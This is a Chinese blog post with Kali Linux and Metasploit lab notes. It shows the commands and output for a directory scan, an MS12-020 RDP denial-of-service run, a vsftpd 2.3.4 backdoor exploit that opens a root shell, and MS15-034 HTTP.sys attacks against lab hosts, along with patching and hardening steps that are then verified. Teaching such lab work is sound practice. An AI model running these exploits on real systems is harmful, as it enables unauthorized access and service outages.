kali系统渗透

最新推荐文章于 2024-10-08 14:17:29 发布
最新推荐文章于 2024-10-08 14:17:29 发布
阅读量1.1k 收藏 6
点赞数
文章标签: ssh 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xigua2540/article/details/131081361
版权

用kali远程ssh时,如果不能的话 按照以下方法

  1. ┌──(root㉿kali)-[~]
  2. └─# mkdir ~/.ssh
  4. ┌──(root㉿kali)-[~]
  5. └─# vim ~/.ssh/config
  6. Host *
  7. HostkeyAlgorithms +ssh-rsa
  8. PubkeyAcceptedKeyTypes +ssh-rsa

msfconlole -q   //进入马上发不显示内容,所以加个q

msf6 > workspace -v      //显示工作区详细信息
msf6 > hosts             //查看扫描结果中的主机
msf6 > services -p 80    //查看扫描结果中80端口信息

1.网站目录扫描(Linux靶机)

    第一步:查找辅助脚本,使用辅助脚本

msf6 > search dir_scan             //搜索dir_scan脚本(找枪)
msf6 > use 0                       //使用编号为0的脚本(端枪)
msf6 > set rhosts 192.168.10.143   //设置攻击目标(瞄准)
msf6 > run                         //运行脚本(开枪)  
  [] Detecting error code
  [] Using code '404' as not found for 192.168.10.143
  [+] Found http://192.168.10.143:80/cgi-bin/ 404 (192.168.10.143)
  [+] Found http://192.168.10.143:80/doc/ 200 (192.168.10.143)
  [+] Found http://192.168.10.143:80/icons/ 404 (192.168.10.143)
  [+] Found http://192.168.10.143:80/index/ 404 (192.168.10.143)
  [+] Found http://192.168.10.143:80/phpMyAdmin/ 200 (192.168.10.143)
  [+] Found http://192.168.10.143:80/test/ 404 (192.168.10.143)        

    第二步:验证网站目录

在物理机浏览器访问: http://192.168.10.143/doc/ //查看网站列表

2、DOS攻击(Windows靶机)

        1)MS12-020 远程桌面漏洞-死亡之蓝

CVE-2012-0002(MS12-020)漏洞,利用Windows系统的远程桌面协议(RDP)存在缓存溢出漏洞,攻击者可通过向目标操作系统发送特定内容的RDP包造成操作系统蓝屏

        

msf6 > search  ms12-020          //搜索ms12-020脚本
Matching Modules
================
   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/ms12_020_check                               normal  Yes    MS12-020 Microsoft Remote Desktop Checker
   1  auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS

  一个是ID为0  有一个关键词scanner ,发扫描的脚本
  一个是ID为1  有一个关键词dos  ,是拒绝服务攻击的脚本

msf6 > use 1                   //使用DOS攻击脚本    
msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.10.142        //设置攻击目标
msf6 auxiliary(scanner/rdp/ms12_020_check) > run                              //攻击

2)防御MS12-020漏洞

安装补丁Windows6.1-KB2621440-x64.msu

 

MSF漏洞利用Exploit应用

 CVE-2011-2523 vsftpd 2.3.4 后门漏洞(笑脸漏洞),此漏洞允许以root身份执行任意命令

msf6 > search vsftpd
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.10.143
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run 
[*] 192.168.10.143:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.10.143:21 - USER: 331 Please specify the password.
[+] 192.168.10.143:21 - Backdoor service has been spawned, handling...
[+] 192.168.10.143:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.Command shell session 1 opened (0.0.0.0:0 -> 192.168.10.143:6200)    //侵入成功
  whoami                 //显示当前用户
  root
  pwd                    //查看当前目录
  /root

CVE-2015-1635漏洞攻防实战

CVE-2015-1635(MS15-034)漏洞存在于HTTP协议堆栈(HTTP.sys)中,攻击者只要发送恶意http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃

补丁文件:Windows6.1-KB3042553-x64

1)漏洞扫描(OpenVAS报告)
2)用poc脚本去验证漏洞真实存在
3)MSF漏洞利用,DOS攻击服务器蓝屏
4)对IIS安全加固:关闭内核缓存
5)MSF漏洞利用,服务器不再蓝屏,成功防御了攻击
6)把内核缓存在开启(内核缓存可加快网站性能)
7)对系统进行加固:安装系统补丁
8)用POC脚本测试,发现提示目标服务器补丁已修复
9)MSF漏洞利用,发现目标服务器不在蓝屏

1、漏洞扫描

 2、POC 漏洞验证脚本

1)上传 cve-2015-1635.poc 到kali 系统

2)修改cve-2015-1635.poc 文件中的 ipaddr 为 win2k8 地址

ipAddr = "192.168.10.137"

3)开始验证

[root@kali ~] # python  cve-2015-1635.poc        //执行POC验证脚本
[*] Audit Started                 //审计开始
[!!] Looks VULN                   //看起来很脆弱(vulnerable)

3、漏洞利用

msf6 > search  ms15-034  
msf6 > use 0 
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.10.137
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run
 //检查W2K8 主机是否蓝屏  

4、对IIS安全加固:关闭内核缓存

 5、MSF漏洞利用,服务器不再蓝屏,成功防御了攻击

sf6 > search ms15-034                                         
msf6 > use 0
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.10.137
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run
 //再次使用攻击脚本去对目标服务器进行攻击,发现目标服务器不在蓝屏了

6、把内核缓存在开启(内核缓存可加快网站性能)

7、对系统进行加固:安装系统补丁

补丁:MS15-034-Windows6.1-KB3042553-x64-2008R2

如果安装不上,先安装SP1补丁集合(windows6.1-KB976932-X64)2012年12月发布 查看已安装补丁:命令提示符下执行systeminfo

8、用POC脚本测试,发现提示目标服务器补丁已修复

[root@kali ~] python  cve-2015-1635.poc 
[*] Audit Started        //开始审计
[*] Looks Patched        //看起来补丁已修复

9、MSF漏洞利用,发现目标服务器不在蓝屏

msf6 > search ms15-034
msf6 > use 0
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.10.137
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run
[] Probably not vulnerable, will not dos it.      //可能没有漏洞,就不攻击他了

xigua2540
关注
记一次Kali系统渗透靶机(物理机)的详细过程(渗透必备)
5年编程经验的老猿。
09-23 1万+
很多人对黑客可能都是这样的印象,低调的穿着,修长的手指快速的在键盘上敲击,界面各种日志不断在打印,但是你有想过黑客用的是什么操作系统吗?windows或者linux? 实际上,很多黑客用的操作系统都是Kali linux,也是一种linux的发行版。 Kali linux系统包含了600多款渗透测试工具,今天我们就给大家分享一次Kali系统渗透靶机的详细过程。...
kali渗透攻击
liuxia6的博客
04-17 1332
渗透测试方法:渗透测试通常包括信息搜集、漏洞扫描、漏洞利用、权限提升和持久性等步骤。通过这些步骤,黑客可以深入了解目标系统的漏洞和弱点,从而进行攻击。常见的渗透攻击手段:常见的渗透攻击手段包括SQL注入、跨站脚本攻击、DDoS攻击、社会工程学攻击等。黑客可以利用这些手段对目标系统进行攻击,获取敏感信息或者破坏系统。预防渗透攻击的方法:为了防止渗透攻击,组织可以采取一系列的安全措施,包括加强系统的安全性、定期进行安全检查、加强员工的安全意识等。通过这些方法,可以有效地防止渗透攻击的发生。
如何使用kali入侵(渗透)一台windows
最新发布
HUANGXIN9898的博客
10-08 1268
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
kali渗透之从0到root的操作系统渗透全过程
m0_56988395的博客
12-02 2423
目录 攻击机 靶机 扫目录 根据提示进行fuzz:模糊测试 尝试wordpress 接下进行注入,在主题编辑器里进行写入木马 提权 注:以下内容仅供学习,请勿用于非法途径 攻击机 kali 靶机 prime1 链接: https://pan.baidu.com/s/1DEXUTVoRNhaYw_CqNzEqow?pwd=4bm5 提取码: 4bm5 或者直接去vulnhub.com下载,里面有各类镜像 首先进入靶机 发现什么都没有 扫目录 dir.
Kali渗透攻击
m0_64091527的博客
05-31 2016
kali渗透攻击
Kali Linux渗透测试技术详解
02-19
第1篇为Iinux安全渗透测试基础,介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限...
基于Kali Linux渗透测试.pdf
09-06
基于Kali Linux渗透测试.pdf 本文档总结了基于Kali Linux渗透测试...本文档提供了基于Kali Linux渗透测试的知识点,涵盖了渗透测试的概念、方法、工具和过程等方面,为读者提供了一个系统的了解渗透测试的机会。
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,帮助安全人员更好的完成项目。课程主要内容:学习Kali Linux安全测试使用工具...
kali系统渗透教程《一》
热门推荐
03-31 1万+
文章目录kali渗透学习安全渗透渗透工具基本设置service apache2 startservice ssh startnetstat -tpan | grep 22信息收集DNSenum枚举DNS枚举工具fierceSNMP枚举工具snmpwalkDMitry工具跟踪路由工具scapy识别活跃的主机 kali渗透学习 安全渗透 渗透:通过模拟攻击评估网络系统安全的方法。 渗透测试:通过已知...
kali的实战渗透
12-14
写的是kali的实战渗透,其中有讲msf渗透kali基础命令使用等等等,非常多
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块将测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使您可以跟踪您的访问。
Qt下载安装及配置教程(非常详细),从零基础入门到精通,看完这一篇就够了
Innocence_0的博客
08-19 4650
下载开源版往下滑,下载Qt在线安装程序它已经检测出我的是windows系统,直接点击download就好。如果是其它的系统,需要找到对应自己系统的安装包。然后跟网速有关,等一会就会自动下载等待下载完成,双击.exe文件,就可以进行安装。首先就是登录qt账户,如果没有可以自行注册一个。然后选择个人用户,之后点击下一步进行安装。如果没有报错,那继续往下:这一步是问你对qt有什么改善的建议,我这里直接选择没有,然后继续进行下一步。
kali攻击ssh私钥泄露
qq_45034855的博客
09-04 1592
kali攻击ssh私钥泄露 本文章用于记录本人成长过程 靶场机器链接:https://pan.baidu.com/s/19aahB9mQAZz94SxvEexBYg 提取码:4htz 目标:找到三个flag值: flag1{make_america_great_again} flag2{use_the_source_luke} lag3{das_bof_meister} ①:打开终端,使用nmap...
小白Kali渗透(一)
weixin_42077203的博客
02-22 4404
Kali渗透(一) —— 道爷低血糖 一、替换源 root@kali:~# vim /etc/apt/sources.list 注释掉原来的外网源 后面的是阿里云、清华、中科大镜像源网站 root@kali:~# apt update 问题1:签名无效 解决: root@kali:~# vim /etc/apt/apt.conf.d/70debconf ```![在这里插入图片描述](https://img-blog.csdnimg.cn/20210222205944536.png) 增...
KaLi Linux渗透攻击
weixin_64531675的博客
06-12 4150
被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。使用browser_autopwn2模块可以建立一个攻击用的WEB服务器,这个服务器集成了多个浏览器漏洞,可以向浏览器发送各种攻击脚本,只要有一个攻击脚本攻击成功,即可建立会话。(将该网址复制到靶机中访问)
Kali渗透基础
lcdqqq的博客
11-14 1606
######局域网断网攻击 arp攻击 arpspoof -i 自己的网卡 -t  目标IP  目标网关 例如:arpspoof  -i   eth0   -t  192.168.1.100 192.168.1.1 ######局域网arp欺骗 目标的IP流量经过我的网卡,从网关出去 首先,进行IP流量转发 echo 1 >/proc/sys/net/ipv4/ip_fo
Kali Linux渗透测试实战指南
本手册专注于Kali Linux,一个专为安全渗透测试设计的操作系统,其前身是BackTrack。Kali Linux集成了大量安全工具,通过定期更新确保工具的最新性。渗透测试领域强调实践,因此手册挑选了91个渗透实例进行详尽的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值